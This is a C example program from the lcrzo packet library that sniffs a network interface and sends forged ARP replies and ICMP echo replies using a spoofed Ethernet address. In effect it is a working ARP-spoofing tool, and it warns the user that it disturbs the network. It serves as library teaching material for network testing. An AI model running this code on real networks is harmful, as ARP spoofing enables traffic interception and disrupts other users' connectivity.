
/* include the library headers */
#include <lcrzo.h>
#include <stdlib.h>
#include <stdio.h>

/*-------------------------------------------------------------*/
/* set information about this example */
lcrzoex_infos lcrzoex_000130=
{ /*reference*/     "lcrzoex", 130,
  /*version*/       1, 0,
  /*title*/         "answer to every ARP/ping request",
  /*french title*/  "repond a toutes les requetes ARP/ping",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "device spoofed_ethernet_address [\"bpf_filter\"]]",
  /*french usage*/  "device adresse_ethernet_usurpee [\"filtre_bpf\"]]",
  /*usage example*/ "eth0 aa:bb:cc:dd:ee:ff \"net 1.2.3.0/24\"",
  /*fr. usage ex.*/ "eth0 aa:bb:cc:dd:ee:ff \"net 1.2.3.0/24\"",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declaration */
int lcrzoex_000130_main(int argc, char *argv[]);
int lcrzoex_000130_dangerousexample(void);
int lcrzoex_000130_answer_arp(lcrzo_data data, lcrzo_int32 datasize,
			      lcrzo_device device, lcrzo_etha ethtospoof);
int lcrzoex_000130_answer_ping(lcrzo_data data, lcrzo_int32 datasize,
			       lcrzo_device device, lcrzo_etha ethtospoof);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000130_main(int argc, char *argv[])
{ lcrzo_device device;
  lcrzo_etha ethtospoof;
  lcrzo_uint32 mtu;
  lcrzo_sniff sniff;
  lcrzo_data sniffdata;
  lcrzo_int32 sniffdatasize;
  int ret;

  if ( argc<3 )
  { /* print usage */
    lcrzo_epr(lcrzoex_infos_print(lcrzoex_000130, argv[0]));
    return(LCRZO_ERR_BULCRZOEXBADUSAGE);
  }

  /* initialize device, ethernet address and mtu */
  lcrzo_epr(lcrzo_device_init(argv[1], device));
  lcrzo_epr(lcrzo_etha_init_eths(argv[2], ethtospoof));
  lcrzo_epr(lcrzo_mtu_init_device(device, &mtu));

  /* ask user if he really wants to continue */
  lcrzo_epr(lcrzoex_000130_dangerousexample());

  /* init sniff */
  if (argc<=3)
  { lcrzo_epr(lcrzo_sniff_init(device, mtu, "", &sniff));
  }
  else
  { lcrzo_epr(lcrzo_sniff_init(device, mtu, argv[3], &sniff));
  }

  /* main loop */
  ret=lcrzo_sniff_nextm(&sniff, LCRZO_TRUE, LCRZO_SNIFF_TYPE_NORMAL, 
			&sniffdata, &sniffdatasize);
  while (ret==LCRZO_ERR_OK)
  { /*lcrzo_packet_print_eth(sniffdata, sniffdatasize,
                           LCRZO_PRINTPROFILE_SYNTHSYNTH);*/
    /* now, we answer to ARP request or ICMP echo request */
    lcrzo_epr(lcrzoex_000130_answer_arp(sniffdata, sniffdatasize,
					device, ethtospoof));
    lcrzo_epr(lcrzoex_000130_answer_ping(sniffdata, sniffdatasize,
					 device, ethtospoof));
    lcrzo_data_free(sniffdata);
    /* sniff next packet */
    ret=lcrzo_sniff_nextm(&sniff, LCRZO_TRUE, LCRZO_SNIFF_TYPE_NORMAL,
			  &sniffdata, &sniffdatasize);
  }

  /* close everything */
  lcrzo_epr(lcrzo_sniff_close(&sniff));
  lcrzo_err_print(ret);
  return (ret);
}

/*-------------------------------------------------------------*/
int lcrzoex_000130_dangerousexample(void)
{ lcrzo_uint8 c;
  int language;

  lcrzo_epr(lcrzo_global_get_language(&language));

  if ( language==LCRZO_GLOBAL_FRLANG )
  { puts("Ceci va perturber le fonctionnement de tout le reseau.");
    lcrzo_epr(lcrzo_stdin_char("Voulez-vous reellement continuer ?",
			       (const lcrzo_uint8*)"oOnN", 'n', &c));
  }
  else
  { puts("This example will disturb your network.");
    lcrzo_epr(lcrzo_stdin_char("Do you really want to continue ?",
			       (const lcrzo_uint8*)"yYnN", 'n', &c));
  }
  if (c=='n' || c=='N') exit(LCRZO_ERR_OK);
  return (LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000130_answer_arp(lcrzo_data data, lcrzo_int32 datasize,
			      lcrzo_device device, lcrzo_etha ethtospoof)
{ lcrzo_hdrleth recv_hdreth, send_hdreth;
  lcrzo_hdrlarp recv_hdrarp, send_hdrarp;
  lcrzo_spoof spoof;
  int ret;
  
  /* try to decode arp */
  ret=lcrzo_packet_decode_etharp(data, datasize, &recv_hdreth, &recv_hdrarp);
  if ( ret!=LCRZO_ERR_OK )
    return(LCRZO_ERR_OK);
  if ( recv_hdreth.type != LCRZO_HDRLETH_TYPE_ARP )
    return(LCRZO_ERR_OK);
  if ( recv_hdrarp.op!=1 )
    return(LCRZO_ERR_OK);

  /* create the new Ethernet header */
  lcrzo_epr(lcrzo_hdrleth_initdefault(&send_hdreth));
  memcpy(send_hdreth.src, ethtospoof, LCRZO_ETHA_MAXBYTES);
  memcpy(send_hdreth.dst, recv_hdrarp.hw_src, LCRZO_ETHA_MAXBYTES);
  send_hdreth.type=LCRZO_HDRLETH_TYPE_ARP;
    
  /* create the new ARP header */
  lcrzo_epr(lcrzo_hdrlarp_initdefault(&send_hdrarp));
  send_hdrarp.op=2;
  memcpy(send_hdrarp.hw_src, ethtospoof, LCRZO_ETHA_MAXBYTES);
  memcpy(send_hdrarp.hw_dst, recv_hdrarp.hw_src, LCRZO_ETHA_MAXBYTES);
  memcpy(send_hdrarp.prot_src, recv_hdrarp.prot_dst, LCRZO_IPA_MAXBYTES);
  memcpy(send_hdrarp.prot_dst, recv_hdrarp.prot_src, LCRZO_IPA_MAXBYTES);
    
  /* send packet */
  lcrzo_epr(lcrzo_spoof_init(&spoof));
  lcrzo_epr(lcrzo_spoof_set_printbeforesending(&spoof, LCRZO_TRUE));
  lcrzo_epr(lcrzo_spoof_set_printprofile(&spoof, 
					 LCRZO_PRINTPROFILE_SYNTHSYNTH));
  lcrzo_epr(lcrzo_spoof_etharp(&spoof, device, send_hdreth, send_hdrarp));
  lcrzo_epr(lcrzo_spoof_close(&spoof));
  return (LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000130_answer_ping(lcrzo_data data, lcrzo_int32 datasize,
			       lcrzo_device device, lcrzo_etha ethtospoof)
{ lcrzo_hdrleth  recv_hdreth,  send_hdreth;
  lcrzo_hdrlip   recv_hdrip,   send_hdrip;
  lcrzo_hdrlicmp recv_hdricmp, send_hdricmp;
  lcrzo_data icmpdata;
  lcrzo_int16 icmpdatasize;
  lcrzo_spoof spoof;
  int ret;

  /* try to decode icmp */
  ret=lcrzo_packet_decodem_ethipopticmpdata(data, datasize, &recv_hdreth,
					    &recv_hdrip, NULL, NULL,
					    &recv_hdricmp, 
					    &icmpdata, &icmpdatasize);
  if ( ret!=LCRZO_ERR_OK )
    return(LCRZO_ERR_OK);
  if ( recv_hdricmp.type != 8 )
    return(LCRZO_ERR_OK);

  /* create the new Ethernet header */
  lcrzo_epr(lcrzo_hdrleth_initdefault(&send_hdreth));
  memcpy(send_hdreth.src, ethtospoof, LCRZO_ETHA_MAXBYTES);
  memcpy(send_hdreth.dst, recv_hdreth.src, LCRZO_ETHA_MAXBYTES);

  /* create the new IP header */
  lcrzo_epr(lcrzo_hdrlip_initdefault(&send_hdrip));
  send_hdrip.saddr=recv_hdrip.daddr;
  send_hdrip.daddr=recv_hdrip.saddr;

  /* create the new ICMP header */
  lcrzo_epr(lcrzo_hdrlicmp_initdefault(&send_hdricmp));
  send_hdricmp.type=0;

  /* send packet */
  lcrzo_epr(lcrzo_spoof_init(&spoof));
  lcrzo_epr(lcrzo_spoof_set_printbeforesending(&spoof, LCRZO_TRUE));
  lcrzo_epr(lcrzo_spoof_set_printprofile(&spoof, 
					 LCRZO_PRINTPROFILE_SYNTHSYNTH));
  lcrzo_epr(lcrzo_spoof_ethipopticmpdata(&spoof, device, send_hdreth, 
					 send_hdrip, NULL, 0,
					 send_hdricmp,icmpdata, icmpdatasize));
  lcrzo_data_free(icmpdata);
  lcrzo_epr(lcrzo_spoof_close(&spoof));
  return (LCRZO_ERR_OK);
}
